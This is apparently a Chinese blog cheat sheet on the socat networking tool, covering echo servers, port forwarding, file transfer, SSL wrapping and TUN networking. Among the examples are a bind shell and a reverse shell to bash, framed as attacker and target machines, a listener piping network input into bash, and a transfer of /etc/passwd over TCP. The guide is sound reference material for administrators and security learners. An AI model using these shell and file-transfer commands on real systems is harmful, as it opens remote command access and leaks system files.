Socat 命令总结 事以密成语以泄败。导航介绍基本语法用法示例1. 回显输入2. 回显输入 over TCP/UDP3. 正向连接 shell4. 反向连接 shell5. 端口转发6. 网络服务7. 文件传输8. 管道传输9. 加密传输10. TUN 网络杂项介绍Socat是一个功能强大的网络工具相当于是增强版 netcat它可以在两个数据流之间建立通道且支持的数据流类型非常丰富例如TCP、UDP、TUN、SOCKS 代理、UNIX 套接字、STDIO 标准输入输出流、PIPE 管道流、OPEN 文件流、EXEC/SHELL/SYSTEM 进程流、OPENSSl 加密流等。基本语法socat[OPTION]ADDRESS_1[,OPTS]ADDRESS_2[,OPTS]ADDRESS_1和ADDRESS_2表示两个通信的端点即数据流。OPTION用于设置全局选项比如单向模式、调试模式、日志级别等。【注单向模式中的 -u 表示左流向右-U 表示右流向左不加则表示双向模式。】OPTS用于设置数据流的选项不同类型的数据流对应的选项亦有所区别常用的选项是 fork、reuseaddr。用法示例1. 回显输入socat - -#STDIO STDIO说明在终端输入什么就输出什么。2. 回显输入 over TCP/UDPsocat - tcp-listen:1234,fork#STDIO TCP 服务端监听1234端口socat - tcp:127.0.0.1:1234#STDIO TCP 客户端连接1234端口socat - udp4-listen:1234,bind192.168.56.20,fork#STDIO UDP 服务端仅监听192.168.56.20接口的1234端口socat - udp4:192.168.56.20:1234#STDIO UDP 客户端连接1234端口说明客户端将输入的数据通过 tcp/udp 通道传输给服务端而服务端又将接收的数据再传输给标准输出。3. 正向连接 shellsocat tcp-listen:1234,fork exec:/bin/bash#TCP EXEC 服务端监听1234端口socat - tcp:127.0.0.1:1234#STDIO TCP 客户端连接1234端口说明服务端将接收到的数据传输给 bash 进程bash 处理之后将结果返回给客户端的标准输出。,4. 反向连接 shellsocat - tcp-listen:1234,fork#STDIO TCP 攻击机监听1234端口socat EXEC:/bin/bash tcp:127.0.0.1:1234#EXEC TCP 靶机连接1234端口#socat - tcp:127.0.0.1:1234 #STDIO TCP 靶机连接1234端口说明攻击机将输入的数据传输给连接它的靶机而靶机又将数据传递给了 bash 进程经其处理之后返回结果到攻击机。【注意如果有多个靶机同时连接攻击机那么攻击机的输入会随机被传递给其中一个靶机而不是同时传递给所有靶机。】5. 端口转发socat tcp-listen:1234,fork tcp:127.0.0.1:8080#TCP TCP说明将本地监听端口 tcp/1234 接收的数据转发到本地的 tcp/8080 端口。【转发到远端亦行】6. 网络服务socat-Utcp-listen:1234,fork open:test.txt#TCP OPEN说明将文件内容作为服务响应返回。【注意此时最好使用-U单向模式(右向左)否则请求可能会覆盖文件内容。】7. 文件传输socat-Utcp-listen:1234,fork open:/etc/passwd#TCP OPEN 发送端socat-utcp:127.0.0.1:1234 open:./passwd.txt,create#TCP OPEN 接收端说明发送端将文件数据传输给连接到监听端口的接收端接收端又将收到的数据打包到新文件中。【注意单向模式的使用】8. 管道传输echook|socat - tcp-listen:1234,fork#PIPE TCP#socat - tcp-listen:1234,fork | bash #TCP PIPE说明1将 echo 输出的数据通过管道传递给连向监听端口的终端2将监听端口接收到的数据传递给 bash 进程处理。9. 加密传输socat openssl-listen:8443,certssl-cert.pem,keyssl-cert.key,verify0,fork tcp:127.0.0.1:8080#OPENSSL TCP OPENSSL 服务端#socat - openssl:127.0.0.1:8443,verify0 #OPENSSL 客户端#注当服务端不是转发给 http 服务时客户端需要此命令配合使用示例截图中的 curl 命令拥有 openssl 客户端的功能故示例没有用到该命令。#注功能测试时证书的生成可以使用 make-ssl-cert /usr/share/ssl-cert/ssleay.cnf ssl-cert 命令生成。说明监听 HTTPS 请求并将其转发到本地的 HTTP 服务。10. TUN 网络socat tcp-listen:1234,fork tun:192.168.1.1/24,up#TCP TUN 服务端socat tcp:192.168.56.20:1234 tun:192.168.1.2/24,up#TCP TUN 客户端说明所有连接到 TUN 服务端的终端全都接入了一个自建的 TUN 网络之中从而实现了异地组网。【在 Linux 中测试是成功的但是在 Windows 中测试时失败了。】杂项Socat 官网http://www.dest-unreach.org/socat/Socat for Windows https://github.com/StudioEtrange/socat-windowsSocat 预编译版本https://github.com/3ndG4me/socat我的博客园

相关新闻

最新新闻

基于TensorFlow的共享出行动态定价预测:从数学建模到工业级实践

基于TensorFlow的共享出行动态定价预测:从数学建模到工业级实践

1. 项目概述:从数学建模到工业级预测去年带队参加数学建模竞赛,我们选了一道关于共享出行平台动态定价的题目。题目给了一堆历史订单数据,要求我们预测未来某时段、某条线路的“建议定价”。队友们一开始想用传统的时间序列或者回归&#xff…

2026/8/29 17:27:02
推理引擎中上下文和工具如何分工

推理引擎中上下文和工具如何分工

推理引擎中上下文和工具如何分工推理引擎里,上下文和工具都在帮助模型完成任务,但它们承担的责任不同。上下文提供当前任务的约束和必要事实;工具提供受控的数据访问与确定性操作。把大量原始数据直接放进提示词,会增加成本并模糊…

2026/8/29 17:27:02
推理服务代码评审的七项检查

推理服务代码评审的七项检查

推理服务代码评审的七项检查 推理服务的代码评审,不能只验证“给一段输入能否返回答案”。服务通常同时处理用户数据、模型配置、流式连接、检索内容和外部工具,任何一个边界含糊都可能变成成本、权限或稳定性问题。下面七项检查适合作为评审起点&#x…

2026/8/29 17:27:02
BAT实习面试全复盘:时间线、内推、算法题与项目深挖

BAT实习面试全复盘:时间线、内推、算法题与项目深挖

1. 投递阶段的水有多深:时间线、内推与简历筛选 很多人在准备BAT实习面试的时候,把百分之八十的精力都砸在刷题和背八股上,结果简历连初筛都没过。我见过太多这样的例子了,包括我自己第一次投递时也吃过这个亏。后来面完三家、复盘…

2026/8/29 17:27:02
FixAnything:用视频生成先验修复3D渲染伪影与不一致

FixAnything:用视频生成先验修复3D渲染伪影与不一致

最近在跟进 3D 渲染方向的新工作,关注到以“FixAnything”为代表的渲染精炼思路:它不再执着于从头训练一个更强大的渲染模型,而是把视频生成模型当作先验,用来修复 3D 渲染中难以避免的伪影和不一致问题。这个方向在 NeRF、3D Gau…

2026/8/29 17:27:02
STM32WBx5低功耗蓝牙mesh开发实战:架构配置与功耗调优

STM32WBx5低功耗蓝牙mesh开发实战:架构配置与功耗调优

做低功耗蓝牙mesh,这两年拿STM32WBx5来评估的工程师越来越多。原因很直接:这颗MCU把应用处理器和无线协议栈拆成两个独立核心,BLE mesh跑在专用核上,应用代码不会因为广播风暴或中继转发被打断,开发节奏也舒服很多。我…

2026/8/29 17:22:02